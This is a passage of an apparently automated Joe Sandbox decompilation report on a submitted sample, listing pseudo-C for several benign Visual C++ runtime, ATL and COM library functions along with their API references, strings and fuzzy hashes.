                      					if(_v12 != 0) {
                      						_t55 =  *_v12;
                      						_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8))))(_v12);
                      						__eflags = _t65 - _t65;
                      						E009D1520(_t40, _t65 - _t65);
                      					}
                      					_t35 = _v20;
                      				} else {
                      					_t35 = 0;
                      				}
                      				_push(_t55);
                      				E009D14C0(_t64, 0x94359c);
                      				_t37 = _t35;
                      				return E009D1520(_t37, _t64 - _t65 + 0x10);
                      			}

















                      APIs
                      • CoRegisterClassObject.OLE32(?,00000000,?,00000000,?), ref: 00943547
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00943581
                      Strings
                      • %ls, xrefs: 009434C6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009434D2
                      • pCache != 0, xrefs: 009434C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckClassObjectRegisterStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1978586063-3984120347
                      • Opcode ID: a386b112b1735cdbf19a80d475e46d88e8b724ddc8502c03b06d43edc07eca43
                      • Instruction ID: 7e8cc4ff98d0ad17b800071a729fc1b261a0cfcc08656471936f2d881dcde7f7
                      • Opcode Fuzzy Hash: a386b112b1735cdbf19a80d475e46d88e8b724ddc8502c03b06d43edc07eca43
                      • Instruction Fuzzy Hash: EF316172A00218AFCB14EFA8D845FAEB7B5AB88354F10C659F5099B351D774DE80CBD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00990A50(intOrPtr _a4) {
                      				signed int _v8;
                      				char _v12;
                      				signed char _v16;
                      				signed char _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed char _t34;
                      				void* _t40;
                      				signed int _t42;
                      				signed int _t60;
                      				void* _t61;
                      
                      				E00976E20( &_v12, _a4);
                      				_t34 = E00979640( &_v12);
                      				_t50 = _t34 & 0x000000ff;
                      				if((_t34 & 0x000000ff) != 0) {
                      					L12:
                      					_v24 = 1;
                      					L13:
                      					_v28 = _v24;
                      					_t70 = _v28;
                      					if(_v28 == 0) {
                      						_t40 = L00994930(_t70, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0, L"%ls", L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))");
                      						_t61 = _t61 + 0x18;
                      						if(_t40 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v28 != 0) {
                      						return 1;
                      					} else {
                      						 *((intOrPtr*)(L00992F70(_t50))) = 0x16;
                      						E00992900(L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))", L"__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0);
                      						return 0;
                      					}
                      				}
                      				_t50 =  &_v12;
                      				_t42 = E009A8780(E0097C080( &_v12));
                      				_t61 = _t61 + 4;
                      				_v8 = _t42;
                      				if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
                      					_v16 = 0xa061f0;
                      				} else {
                      					_t60 = _v8 >> 6;
                      					_t50 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + _t60 * 4));
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + _t60 * 4));
                      				}
                      				if( *((char*)(_v16 + 0x29)) != 0) {
                      					L11:
                      					_v24 = 0;
                      					goto L13;
                      				} else {
                      					if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
                      						_v20 = 0xa061f0;
                      					} else {
                      						_v20 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
                      					}
                      					_t25 = _v20 + 0x2d; // 0x0
                      					_t50 =  *_t25 & 0x00000001;
                      					if(( *_t25 & 1) == 0) {
                      						goto L12;
                      					} else {
                      						goto L11;
                      					}
                      				}
                      			}















                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00990A5F
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      Strings
                      • %ls, xrefs: 00990B21
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio.h, xrefs: 00990B2D, 00990B5A
                      • __acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required, xrefs: 00990B5F
                      • ( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && , xrefs: 00990B1C, 00990B64
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                      • API String ID: 4219598475-3476576762
                      • Opcode ID: 1d45c782f11a7321c0ff63453ea20c16f7adf0d9d6ae95393b5de0616312bd53
                      • Instruction ID: 1fa0929a8d5b81dd94502b61b3dad28fa67355e7a076cfb6addf76bc1c89e1fd
                      • Opcode Fuzzy Hash: 1d45c782f11a7321c0ff63453ea20c16f7adf0d9d6ae95393b5de0616312bd53
                      • Instruction Fuzzy Hash: 4731B2B0D41309EFCF14DF98DC06BAEB7B8AB90319F248259E0216B2D2D7745A51DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E009A3520(signed int _a4) {
                      				struct HINSTANCE__* _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t38;
                      				void* _t41;
                      
                      				_t44 = 0xb31098 + _a4 * 4;
                      				_v12 = E0096AE90(0xb31098 + _a4 * 4);
                      				if(_v12 == 0) {
                      					_v8 = E009A3670(_t44,  *((intOrPtr*)(0x9e8730 + _a4 * 4)));
                      					__eflags = _v8;
                      					if(_v8 != 0) {
                      						_v20 = E0096AE60(0xb31098 + _a4 * 4, _v8);
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							__eflags = _v20 - _v8;
                      							if(__eflags != 0) {
                      								_t38 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xff, 0, L"%ls", L"cached_handle == new_handle");
                      								__eflags = _t38 - 1;
                      								if(_t38 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							FreeLibrary(_v8);
                      						}
                      						return _v8;
                      					}
                      					_v16 = E0096AE70(0xb31098 + _a4 * 4, 0xffffffff);
                      					__eflags = _v16;
                      					if(_v16 != 0) {
                      						__eflags = _v16 - 0xffffffff;
                      						if(__eflags != 0) {
                      							_t41 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xf3, 0, L"%ls", L"cached_handle == INVALID_HANDLE_VALUE");
                      							__eflags = _t41 - 1;
                      							if(_t41 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      					return 0;
                      				}
                      				if(_v12 == 0xffffffff) {
                      					return 0;
                      				}
                      				return _v12;
                      			}










                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                      • API String ID: 0-442401637
                      • Opcode ID: 7cd2608acb89bd99e02a79d0c9650171d6d1a0f0e0288687003769746cbe6cdf
                      • Instruction ID: 734f0f5a01484647085edaed62daf63bcfac17d3cad23a35dc84b93bde7aa7eb
                      • Opcode Fuzzy Hash: 7cd2608acb89bd99e02a79d0c9650171d6d1a0f0e0288687003769746cbe6cdf
                      • Instruction Fuzzy Hash: 9E21A270D40209FBCF10EFA8DC4AF6E7778AB42318F248955F419A72C1EA71AB44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00941BB0(void* __ecx, void* __esi, char* _a4, short* _a8, int _a12, int _a16) {
                      				intOrPtr _v8;
                      				char* _t14;
                      				int _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t22;
                      				void* _t31;
                      				void* _t32;
                      
                      				_v8 = 0xcccccccc;
                      				_t34 = _a8;
                      				if(_a8 == 0) {
                      					_t22 = L00994930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24d, 0, "%ls", L"lpw != 0");
                      					_t32 = _t32 + 0x18;
                      					if(_t22 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t36 = _a4;
                      				if(_a4 == 0) {
                      					_t21 = L00994930(_t36, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24e, 0, "%ls", L"lpa != 0");
                      					_t32 = _t32 + 0x18;
                      					if(_t21 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t14 = 0;
                      				} else {
                      					 *_a4 = 0;
                      					_t18 = WideCharToMultiByte(_a16, 0, _a8, 0xffffffff, _a4, _a12, 0, 0);
                      					__eflags = _t32 - _t32;
                      					_v8 = E009D1520(_t18, _t32 - _t32);
                      					__eflags = _v8;
                      					if(__eflags != 0) {
                      						_t14 = _a4;
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x258, 0, "%ls", 0x9f40dc);
                      							_t32 = _t32 + 0x18;
                      							__eflags = _t20 - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_t14 = 0;
                      					}
                      				}
                      				return E009D1520(_t14, _t31 - _t32 + 4);
                      			}












                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00941C44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: f4c9ec26785b7cb2ba321b33d2fca643bf08a86e52564cd30c06ed2c902da742
                      • Instruction ID: 89042fcf50cb95c50284fe9fc8789d80045ae0dafd73458d65aad25909c20676
                      • Opcode Fuzzy Hash: f4c9ec26785b7cb2ba321b33d2fca643bf08a86e52564cd30c06ed2c902da742
                      • Instruction Fuzzy Hash: 2B21D431BC031CBBDB209B58DC87FAB32689BA0B56F108505FB156A1C1D6B199D08BD5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E00943E80(intOrPtr __ecx, void* __esi, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t23;
                      				intOrPtr _t24;
                      				void* _t30;
                      				void* _t32;
                      				intOrPtr _t35;
                      				void* _t48;
                      				void* _t49;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t51 = _a4;
                      				if(_a4 == 0) {
                      					_t23 = L00994930(_t51, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc25, 0, "%ls", L"ppGIT != 0");
                      					_t49 = _t49 + 0x18;
                      					if(_t23 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 != 0) {
                      					_v12 = 0;
                      					_t35 = _v8;
                      					__eflags =  *((intOrPtr*)(_t35 + 0x28));
                      					if( *((intOrPtr*)(_t35 + 0x28)) == 0) {
                      						__imp__CoCreateInstance(0x9d65d0, 0, 1, 0xa00548, _v8 + 0x28);
                      						__eflags = _t49 - _t49;
                      						_v12 = E009D1520(_t23, _t49 - _t49);
                      					}
                      					__eflags = _v12;
                      					if(__eflags < 0) {
                      						L13:
                      						_t24 = _v12;
                      						L14:
                      						return E009D1520(_t24, _t48 - _t49 + 8);
                      					} else {
                      						do {
                      							__eflags =  *((intOrPtr*)(_v8 + 0x28));
                      							if(__eflags == 0) {
                      								_t32 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc33, 0, "%ls", L"m_pGIT != 0");
                      								_t49 = _t49 + 0x18;
                      								__eflags = _t32 - 1;
                      								if(_t32 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = 0;
                      						} while (0 != 0);
                      						 *_a4 =  *((intOrPtr*)(_v8 + 0x28));
                      						_t30 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)))) + 4))))( *((intOrPtr*)(_v8 + 0x28)));
                      						__eflags = _t49 - _t49;
                      						E009D1520(_t30, __eflags);
                      						goto L13;
                      					}
                      				}
                      				_t24 = 0x80004003;
                      				goto L14;
                      			}

                      APIs
                      • CoCreateInstance.OLE32(009D65D0,00000000,00000001,00A00548,CCCCCCA4), ref: 00943EFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_pGIT != 0$ppGIT != 0
                      • API String ID: 542301482-2412262283
                      • Opcode ID: cefe0e106b777af25cd9fc67dd7254f9dde6435d12f9fef2cae6a28e8b269e5c
                      • Instruction ID: 716dfe736678160280c97e0805ebbd154d1db3b54dacd52b787dcd45d4d34e7e
                      • Opcode Fuzzy Hash: cefe0e106b777af25cd9fc67dd7254f9dde6435d12f9fef2cae6a28e8b269e5c
                      • Instruction Fuzzy Hash: B2218071E80218BFDB10EB68D982F6DB775AB94718F20C184F9046B391D7B19E80CB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00962BE0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				char* _v32;
                      				char _v36;
                      				char* _v40;
                      				char _v44;
                      				char _v52;
                      				char _t27;
                      				char* _t36;
                      				char _t38;
                      				intOrPtr* _t40;
                      				char* _t47;
                      				intOrPtr _t57;
                      				char* _t58;
                      				intOrPtr _t59;
                      				void* _t62;
                      				void* _t63;
                      
                      				_t57 = __edx;
                      				_t27 = E00960130(__ecx, 0);
                      				_t63 = _t62 + 4;
                      				_v28 = _t27;
                      				_v24 = _t57;
                      				E0095F1F0( &_v20,  &_v28);
                      				_t47 =  *0xb30640; // 0x0
                      				_t58 =  *_t47;
                      				if(_t58 == 0) {
                      					L0095FF10( &_v20, 1);
                      					L10:
                      					_v44 = E00960060(") ", 2);
                      					_v40 = _t58;
                      					E0095FCA0( &_v20,  &_v44);
                      					E0095F240(_a4,  &_v20);
                      					return _a4;
                      				}
                      				_t36 =  *0xb30640; // 0x0
                      				_v12 =  *_t36;
                      				_t59 =  *0xb30640; // 0x0
                      				_t58 = _t59 + 1;
                      				 *0xb30640 = _t58;
                      				_v8 = _v12;
                      				if(_v8 == 0x30) {
                      					_t38 = E00960060("void", 4);
                      					_t63 = _t63 + 8;
                      					_v36 = _t38;
                      					_v32 = _t58;
                      					E0095FCA0( &_v20,  &_v36);
                      					L8:
                      					goto L10;
                      				}
                      				if(_v8 == 0x32) {
                      					_t58 =  &_v52;
                      					_t40 = E00967B30(__ebx, __edi, __esi, __eflags, _t58);
                      					_t63 = _t63 + 4;
                      					E0095FD40( &_v20, _t40);
                      					goto L8;
                      				}
                      				if(_v8 == 0x35) {
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				goto L8;
                      			}

                      APIs
                        • Part of subcall function 00960130: UnDecorator::doUnderScore.LIBCMTD ref: 00960136
                      • DName::DName.LIBVCRUNTIMED ref: 00962C82
                      • DName::operator+=.LIBCMTD ref: 00962C93
                      • Mailbox.LIBCMTD ref: 00962CC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
                      • String ID: 5$void
                      • API String ID: 3298578019-571193483
                      • Opcode ID: d0f2561dd9c77b34b0833159ad684014fc5f8e5b1d1275570273ac7ea701c9a7
                      • Instruction ID: 2af5a5318f143026937f19493607a9846a341b19c055fa32dce8e60b14d4a52a
                      • Opcode Fuzzy Hash: d0f2561dd9c77b34b0833159ad684014fc5f8e5b1d1275570273ac7ea701c9a7
                      • Instruction Fuzzy Hash: 6A21A6B0D54618DBCB08EF94DC92AEEBB74BF84301F14417AE84667291DB346B44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00967F80(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                      				char _v8;
                      				char _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				intOrPtr _t30;
                      				intOrPtr _t34;
                      				intOrPtr _t39;
                      				intOrPtr _t42;
                      				char* _t45;
                      				intOrPtr _t46;
                      				char* _t50;
                      				char* _t51;
                      				char* _t52;
                      				intOrPtr _t53;
                      				char* _t55;
                      
                      				E0095F1F0( &_v20, 0x9d8cb8 + _a8 * 8);
                      				_t51 =  *0xb30640; // 0x0
                      				_v8 =  *_t51;
                      				_t39 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t39 + 1;
                      				if(_v8 != 0x40) {
                      					L2:
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t52 =  *0xb30640; // 0x0
                      				_v12 =  *_t52;
                      				_t42 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t42 + 1;
                      				if(_v12 == 0x5f) {
                      					_t53 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t53 + 1;
                      					E00964900(__ebx, __edi, __esi,  &_v28, 0);
                      					E00964900(__ebx, __edi, __esi,  &_v36, 0);
                      					while(1) {
                      						_t55 =  *0xb30640; // 0x0
                      						if( *_t55 == 0) {
                      							break;
                      						}
                      						_t50 =  *0xb30640; // 0x0
                      						if( *_t50 == 0x40) {
                      							break;
                      						}
                      						_t34 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t34 + 1;
                      					}
                      					_t45 =  *0xb30640; // 0x0
                      					if( *_t45 != 0) {
                      						_t46 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t46 + 1;
                      						E0095F240(_a4,  &_v20);
                      						return _a4;
                      					}
                      					_t30 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t30 - 1;
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Mailbox
                      • String ID: @$_
                      • API String ID: 4073702289-2246572305
                      • Opcode ID: 88a5b99b9d2f4b3a8f7e09a9a5000424cc63bc1734720d1673c3be05b4141e66
                      • Instruction ID: def05b12bc5777db7e4a73a72cb542fdb4acca4b31448fcf077ad5ece58d483d
                      • Opcode Fuzzy Hash: 88a5b99b9d2f4b3a8f7e09a9a5000424cc63bc1734720d1673c3be05b4141e66
                      • Instruction Fuzzy Hash: 19316FB0690924DFE704EF54ECA2ABE3B75FFC1305F244159E8094B269DF31A965CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E009D2000(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				char _v16;
                      				char _v528;
                      				char _v1040;
                      				char _v1552;
                      				void* __esi;
                      				signed int _t17;
                      				signed int _t31;
                      				void* _t44;
                      				intOrPtr _t46;
                      				signed int _t47;
                      
                      				_t45 = __edi;
                      				_t35 = __ebx;
                      				_t17 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t17 ^ _t47;
                      				_t46 = _a8;
                      				if(E009D4BA0(_a4,  &_v16, 3,  &_v1552, 0x100,  &_v1040, 0x100,  &_v528, 0x100) != 0 || E00992600( &_v1040, 9, L"MSPDB140") != 0 || E00992600( &_v528, 4, L"DLL") != 0) {
                      					return E00957280(0, _t35, _v8 ^ _t47, _t44, _t45, _t46);
                      				} else {
                      					_t31 = E009D2ED0(_t46, _a12,  &_v16,  &_v1552,  &_v1040,  &_v528);
                      					asm("sbb eax, eax");
                      					return E00957280( ~_t31 + 1, __ebx, _v8 ^ _t47, _t44, __edi, _t46);
                      				}
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize$Report
                      • String ID: DLL$MSPDB140
                      • API String ID: 4069037947-1197931371
                      • Opcode ID: 18bf8a575aa0ddfaadf8269d89de96ed85fd1c33dafbdc47a72b96d2149b226b
                      • Instruction ID: 6073355cd20aa0170958a8a6507bfce6c385b1a17eeea26a00b8e72db0e188cd
